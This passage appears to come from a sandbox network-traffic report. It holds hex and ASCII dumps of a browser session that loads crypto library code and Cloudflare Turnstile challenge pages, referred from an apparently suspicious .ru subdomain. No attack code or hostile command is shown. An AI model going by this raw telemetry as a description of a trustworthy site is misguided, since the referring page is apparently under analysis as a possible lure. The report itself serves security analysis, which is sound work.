                                                                Data Ascii: or(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]
                                                                2025-01-13 19:54:50 UTC1369INData Raw: 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75
                                                                Data Ascii: ,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:fu
                                                                2025-01-13 19:54:50 UTC1369INData Raw: 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51
                                                                Data Ascii: arAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQ
                                                                2025-01-13 19:54:50 UTC1369INData Raw: 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73
                                                                Data Ascii: .sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this
                                                                2025-01-13 19:54:50 UTC1369INData Raw: 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b
                                                                Data Ascii: ,m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.549722104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:54:50 UTC798OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ttfv6/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/ HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Upgrade-Insecure-Requests: 1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-Dest: iframe
                                                                Referer: https://rfll.yordickyel.ru/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:54:50 UTC1362INHTTP/1.1 200 OK
                                                                Date: Mon, 13 Jan 2025 19:54:50 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 26635
                                                                Connection: close
                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                cross-origin-embedder-policy: require-corp
                                                                cross-origin-opener-policy: same-origin
                                                                cross-origin-resource-policy: cross-origin
                                                                origin-agent-cluster: ?1
                                                                accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                referrer-policy: same-origin
                                                                document-policy: js-profiling
                                                                2025-01-13 19:54:50 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 31 37 66 30 63 31 39 62 66 36 34 33 35 37 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                Data Ascii: Server: cloudflareCF-RAY: 9017f0c19bf64357-EWRalt-svc: h3=":443"; ma=86400
                                                                2025-01-13 19:54:50 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                2025-01-13 19:54:50 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                2025-01-13 19:54:50 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                2025-01-13 19:54:50 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                2025-01-13 19:54:50 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                2025-01-13 19:54:50 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                2025-01-13 19:54:50 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                2025-01-13 19:54:50 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                2025-01-13 19:54:50 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.549724104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:54:51 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9017f0c19bf64357&lang=auto HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ttfv6/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:54:51 UTC331INHTTP/1.1 200 OK
                                                                Date: Mon, 13 Jan 2025 19:54:51 GMT
                                                                Content-Type: application/javascript; charset=UTF-8
                                                                Content-Length: 110311
                                                                Connection: close
                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                Server: cloudflare
                                                                CF-RAY: 9017f0c598960f85-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-13 19:54:51 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"http
                                                                2025-01-13 19:54:51 UTC1369INData Raw: 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 22 54 69 6d 65 64 25 32 30 6f 75 74 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73
                                                                Data Ascii: 20the%20Site%20Administrator%20if%20this%20problem%20persists.","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_timeout":"Timed%20out","testing_only":"Testing%20only.","outdated_browser":"Your%20browser%20is
